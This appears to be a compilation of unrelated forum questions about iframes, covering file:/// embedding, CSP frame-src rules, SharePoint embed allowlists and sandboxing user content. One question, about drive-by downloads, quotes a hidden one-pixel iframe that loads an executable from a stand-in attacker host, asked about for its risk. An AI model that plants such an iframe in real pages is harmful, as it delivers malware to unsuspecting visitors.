Are IFRAMEs inherently unable to display file:/// URLs?

Yes, the browser and webserver are on the same machine!

Whenever I try to embed a HTML file from outside of the WWW root in an iframe, thus using the file:/// URL syntax, it is ignored. No error message logged or anything. Just nothing is done whatsoever.

If I change the path from file:///C:\blablabla.html to ./blablabla.html, and put the file in the WWW root, it will display the HTML page in the iframe. So it’s not some kind of fundamental issue with displaying iframes or anything. I have tried both with and without URL-encoding the C:\... part.

Are IFRAMEs inherently unable to display file:/// URIs, even though the MozDev page mentions no restrictions whatsoever for the src attribute? https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

Alternative approaches to Iframes for content distribution via json api

I am currently working on a project that uses iframes to distribute content to customers. Going ahead we would like to switch to a json based rest api to deliver the content. Api access would need a token to which specific content could be exposed and traffic limits set.

To replace the frontend appearance of the iframe I am thinking about writing a reusable bundle using a lightweight react alternative like preactjs. But this would mean exposing the raw api and the specific token to the end user. Simply routing user requests via the customers server would conceal the token but still allow raw api access to the enduser.

What would be a good architecture for such a use case?

Are there server side rendered solutions that can easily be implemented across a variety of backend frameworks, without rewriting everything for each customer that is?

Thanks for any advice

Correct CSP frame-src value for iframes with empty src value

We have below CSP derivatives defined in our site,

script-src 'self' 'unsafe-inline' 'unsafe-eval'  *.youtube.com; style-src  'self' 'unsafe-inline'; frame-src *.facebook.com  www.youtube.com; 

As per this value, we only allowed facebook, youtube domains as src value in our site iframes. But we have below iframes rendered in our site.

<iframe id="EPFACLC-1579856043157" src="about:blank" frameborder="0" scrolling="no" title="chat widget"></iframe> 

How this iframes are not restricted by the CSP rule?

Thanks in advance.

Drive by download with iframes

does the definition of a drive by download include malicious execution of an unaccepted downloaded file or is the unaccepted download of a file the drive by download by itself. I didn’t find a good/clear definition.

Why is it possible to download files with a hidden iframe, so the user isn’t even asked if he wants to download it. Something like this:

<iframe src="https://attacker.com/evil.exe" width="1" height="1" frameborder="0"></iframe> 

Isnt this way to risky?

Thank you for your answers.

adding domain to HTML Field Security does not effect Library > Add Video > Embed iframes

I’m using a video hosting service that provides me with embed codes for the videos: something like this:

<iframe title="Part 1" width="640" height="360" allowTransparency="true" mozallowfullscreen webkitallowfullscreen allowfullscreen style="background-color:transparent;" frameBorder="0" src="https://app.vidgrid.com/embed/--video-id--"></iframe> 

This works totally fine if embedded by a contributor on a SharePoint page (clicking “Add A Page > insert > Embed Code”) because I have added the video’s domain (app.vidgrid.com) to the HTML Field Security allowed list. But. We have a Video Library (“Libraries > Training Video Library > Add > Video”) which also allows video iframes, but the contributor sees this error (works for me, as an admin):

Create new video from vidgrid gives error "the embed code is invalid because the source of the embed content is not allowed"

My guess is, SharePoint isn’t using the HTML Field Security allowed domain list for this video embed piece. Is there any hope? 😀 Or does everyone just need to add a full page for each video, or download the video as an MP4 and re-upload it to sharepoint (works but clunky).

iframes, user generated content and scripts

Currently, we have a small personal project which is meant to allow people to create ‘profiles’ in HTML/CSS. We aim to put all this generated content within a sandboxed iframe. The next point in discussion comes from allowing scripts in these iframes since users will be able to enter whatever content they want.

Couple things to note:

  • All these iframes are hosted under the same subdomain
  • The site has a cross-origin policy of : allow-all
  • Authorization is handled through tokens stored within a React app. Not cookies.

I am mostly curious on the security risks of such a design and I have not found a clear concise answer. Should allow scripts within these iframes? or does this pose too much of a risk. What type of attacks are we looking at through an iframe? I am concerned mostly with XSS-type attacks. What about browser vulnerabilities with iframes?

Thanks! Any feedback would be greatly appreciated.